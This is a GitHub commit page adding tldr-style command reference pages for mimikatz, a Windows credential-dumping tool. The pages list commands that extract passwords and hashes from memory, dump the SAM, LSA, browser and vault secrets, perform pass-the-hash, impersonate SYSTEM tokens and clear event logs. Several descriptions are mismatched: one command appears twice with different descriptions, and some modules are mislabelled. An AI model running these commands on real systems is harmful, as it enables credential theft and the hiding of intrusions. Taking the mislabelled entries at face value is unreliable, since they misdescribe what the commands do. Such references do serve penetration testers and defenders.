1
0
Fork 0
mirror of https://github.com/tldr-pages/tldr.git synced 2025-08-04 00:15:32 +02:00

mimikatz: add pages (#17405)

Co-authored-by: Managor <42655600+Managor@users.noreply.github.com>
This commit is contained in:
Adriano Inghingolo 2025-07-30 16:04:22 +02:00 committed by GitHub
parent 7fd3d02e40
commit b9aed740bd
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
15 changed files with 247 additions and 0 deletions

View file

@ -0,0 +1,16 @@
# mimikatz crypto
> Manipulate Windows cryptographic services and certificates.
> More information: <https://github.com/gentilkiwi/mimikatz>.
- List cryptographic providers:
`mimikatz "crypto::providers"`
- List keys in a cryptographic provider:
`mimikatz "crypto::capi"`
- Export certificates and keys:
`mimikatz "crypto::certificates /export"`

View file

@ -0,0 +1,16 @@
# mimikatz dpapi
> Interact with the Windows Data Protection API (DPAPI).
> More information: <https://github.com/gentilkiwi/mimikatz>.
- List master keys:
`mimikatz "dpapi::masterkey /list"`
- Decrypt a DPAPI blob:
`mimikatz "dpapi::blob /in:blob_file.bin"`
- Retrieve Chrome credentials using DPAPI:
`mimikatz "dpapi::chrome /in:Login Data"`

View file

@ -0,0 +1,12 @@
# mimikatz event
> Manage Windows Event Log records.
> More information: <https://github.com/gentilkiwi/mimikatz>.
- Clear event logs:
`mimikatz "event::clear"`
- Display event log sources:
`mimikatz "event::providers"`

View file

@ -0,0 +1,16 @@
# mimikatz kerberos
> Interact with Kerberos tickets.
> More information: <https://github.com/gentilkiwi/mimikatz>.
- List current Kerberos tickets:
`mimikatz "kerberos::list"`
- Purge all Kerberos tickets:
`mimikatz "kerberos::purge"`
- Inject a ticket from a `.kirbi` file:
`mimikatz "kerberos::ptt ticket.kirbi"`

View file

@ -0,0 +1,17 @@
# mimikatz lsadump
> Dump secrets from the Windows Local Security Authority (LSA).
> Requires SYSTEM privileges.
> More information: <https://github.com/gentilkiwi/mimikatz>.
- Dump SAM hashes:
`mimikatz "lsadump::sam"`
- Dump secrets from the SECURITY hive:
`mimikatz "lsadump::secrets"`
- Dump cached domain credentials:
`mimikatz "lsadump::cache"`

View file

@ -0,0 +1,16 @@
# mimikatz misc
> Miscellaneous system and utility commands.
> More information: <https://github.com/gentilkiwi/mimikatz>.
- Trigger Blue Screen of Death (for testing):
`mimikatz "misc::bsod"`
- List loaded kernel drivers:
`mimikatz "misc::minidump"`
- Change system time:
`mimikatz "misc::systemtime"`

View file

@ -0,0 +1,16 @@
# mimikatz net
> Perform network and domain operations.
> More information: <https://github.com/gentilkiwi/mimikatz>.
- List domain users:
`mimikatz "net::users"`
- List domain computers:
`mimikatz "net::computers"`
- Retrieve domain controller information:
`mimikatz "net::domaincontrollers"`

View file

@ -0,0 +1,12 @@
# mimikatz privilege
> Manage privileges for mimikatz operations.
> More information: <https://github.com/gentilkiwi/mimikatz>.
- Enable debug privilege (required for many modules):
`mimikatz "privilege::debug"`
- Check current privilege state:
`mimikatz "privilege::whoami"`

View file

@ -0,0 +1,12 @@
# mimikatz process
> Manage process privileges and tokens.
> More information: <https://github.com/gentilkiwi/mimikatz>.
- List processes with their tokens:
`mimikatz "process::list"`
- Elevate mimikatz to a SYSTEM process:
`mimikatz "process::token /user:NT AUTHORITY\SYSTEM"`

View file

@ -0,0 +1,17 @@
# mimikatz sekurlsa
> Extract credentials and secrets from memory.
> Requires debug privileges.
> More information: <https://github.com/gentilkiwi/mimikatz>.
- Extract plaintext passwords:
`mimikatz "sekurlsa::logonpasswords"`
- List Kerberos tickets in memory:
`mimikatz "sekurlsa::tickets"`
- Dump LSA secrets:
`mimikatz "sekurlsa::secrets"`

View file

@ -0,0 +1,16 @@
# mimikatz service
> Manage Windows services through mimikatz.
> More information: <https://github.com/gentilkiwi/mimikatz>.
- Start a service:
`mimikatz "service::start service_name"`
- Stop a service:
`mimikatz "service::stop service_name"`
- Delete a service:
`mimikatz "service::delete service_name"`

View file

@ -0,0 +1,16 @@
# mimikatz standard
> Basic commands and mimikatz environment management.
> More information: <https://github.com/gentilkiwi/mimikatz>.
- Display system information:
`mimikatz "standard::info"`
- Clear the mimikatz command history:
`mimikatz "standard::clearev"`
- Show command history:
`mimikatz "standard::history"`

View file

@ -0,0 +1,16 @@
# mimikatz token
> List and manipulate security tokens.
> More information: <https://github.com/gentilkiwi/mimikatz>.
- List tokens:
`mimikatz "token::list"`
- Elevate privileges by impersonating a token:
`mimikatz "token::elevate"`
- Revert to original token:
`mimikatz "token::revert"`

View file

@ -0,0 +1,12 @@
# mimikatz vault
> Extract credentials stored in the Windows Credential Vault.
> More information: <https://github.com/gentilkiwi/mimikatz>.
- List vault credentials:
`mimikatz "vault::list"`
- Dump all vault credentials:
`mimikatz "vault::cred"`

37
pages/windows/mimikatz.md Normal file
View file

@ -0,0 +1,37 @@
# mimikatz
> Interact with Windows credentials, perform credential dumping, token manipulation, and more.
> Requires administrator privileges and typically runs on Windows.
> More information: <https://github.com/gentilkiwi/mimikatz>.
- Run mimikatz in interactive mode:
`mimikatz`
- Enable debug privileges (needed for most operations):
`mimikatz "privilege::debug"`
- List available logon sessions:
`mimikatz "sekurlsa::logonpasswords"`
- Dump plaintext passwords, NTLM hashes, and Kerberos tickets from memory:
`mimikatz "sekurlsa::logonpasswords"`
- Pass-the-Hash with a specific NTLM hash and launch a command:
`mimikatz "sekurlsa::pth /user:{{username}} /domain:{{domain}} /ntlm:{{hash}} /run:{{cmd}}"`
- Dump local SAM database hashes:
`mimikatz "lsadump::sam"`
- Extract Kerberos tickets and export to a file:
`mimikatz "kerberos::list /export"`
- Exit mimikatz:
`exit`